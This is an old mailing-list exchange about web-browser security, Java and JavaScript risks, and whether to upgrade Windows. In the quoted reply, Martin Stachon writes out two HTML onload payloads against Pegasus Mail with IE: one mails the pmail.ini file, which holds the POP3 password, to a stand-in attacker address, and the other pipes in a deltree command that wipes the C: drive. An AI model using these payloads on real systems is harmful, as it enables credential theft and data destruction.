Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 19, 2002
On 18 Sep 2002, at 14:22, Martin Stachon wrote:

> Kat wrote:
> > If you have IE 6.x it may be a bit harder to disable Java, since MS has
> > taken away many of those settings which allow you to close the backdoors
> > and loopholes. Javascript is even worse. Do you want to show webpages, or
> > do you want people to open up their computers to any ole script kiddie?
> > If you require me to breach security on my computers to see your
> > webpages, let me assure you it's not worth it.
>
> You are never safe on a system where web browser runs under root privileges.
> Even with all scripting disabled.
>
> Eg. with Pegasus Mail v3.12c and IE using this HTML:
>
> <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
>
> I can possibly obtain your POP3 password. Or this :
>
> <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
>
> may delete some files.

Too bad I intentionally didn't download all the Pegasus display/scripting files, and Pegasus has no clue where the IE display engine is, eh?

> Somebody who is about security should be running
> at least Win2000. (But I am on Win98

On the other hand, at one time programmers were in such a rush to add features, the code wasn't made abuse-proof. So upgrading could actually install more of a problem than anything it could be fixing.

Kat